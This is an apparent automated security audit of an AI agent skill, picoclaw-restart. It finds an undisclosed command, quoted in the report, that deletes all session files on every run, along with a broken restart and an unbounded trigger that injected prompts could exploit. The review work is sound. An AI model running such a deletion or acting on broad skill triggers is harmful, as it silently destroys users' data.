Is gmoogway/picoclaw-restart safe?

https://github.com/openclaw/skills/tree/main/skills/gmoogway/picoclaw-restart

70
CAUTION

The picoclaw-restart skill contains an undisclosed and unconditional 'rm /root/.picoclaw/workspace/sessions/*' that permanently deletes all picoclaw session data every time the skill is invoked, with no mention of this in SKILL.md. Additionally, the actual restart mechanism is broken — the only active command kills a single child process while all proper rc-service restart lines are commented out — meaning invocation both destroys user data and fails to cleanly restart the service. No credential theft or outbound exfiltration paths were identified, and canary files remained intact, but the combination of undisclosed destructive behavior and an overly broad activation trigger ('other services') makes this skill unsuitable for installation without significant remediation.

Category Scores

Prompt Injection 75/100 · 30%
Data Exfiltration 90/100 · 25%
Code Execution 25/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 30/100 · 5%

Findings (6)

HIGH Undisclosed and unconditional session data deletion -55

restart.sh runs 'rm /root/.picoclaw/workspace/sessions/*' as its first action on every invocation. This permanently deletes all picoclaw session files. SKILL.md describes the skill only as 'restart system services' with no mention of session wiping. Users and reviewers cannot anticipate this side-effect from the skill description alone.

HIGH Service not actually restarted — only one child process killed -20

The active kill command targets a single child process of the picoclaw PID, not the service itself. All three commented-out lines that would correctly restart picoclaw via rc-service are disabled. The net effect is potential service breakage (child killed, parent orphaned) rather than a clean restart.

MEDIUM Overly broad trigger scope ('other services') -15

SKILL.md instructs the agent to execute restart.sh 'when user requests to restart picoclaw or other services.' The phrase 'other services' is unbounded and could be interpreted to cover any system service, expanding the blast radius of this skill far beyond picoclaw.

MEDIUM Hardcoded root-owned absolute path in skill instructions -10

SKILL.md instructs the agent to invoke /root/.picoclaw/workspace/skills/restart/restart.sh. This path is under /root, implying the agent must run as or have access to root. It also locks the skill to a single host layout, making the skill brittle and difficult to audit across environments.

LOW Skill can be used to wipe user sessions on demand via normal requests -50

Because the session deletion is unconditional and the trigger phrase is broad, any conversation that mentions restarting picoclaw — including injected or adversarially crafted prompts — will silently destroy all active sessions. This is a low-effort denial-of-service vector against the host's users.

INFO Canary file reads attributed to audit framework initialization, not skill 0

Filesystem and auditd events show .env, .ssh/id_rsa, .aws/credentials, and cloud credential files were opened at timestamp 1771922142, which corresponds to the Oathe monitoring setup phase (sudo/inotifywait initialization). The skill script itself contains no reads of these files, and all canary hashes remain intact.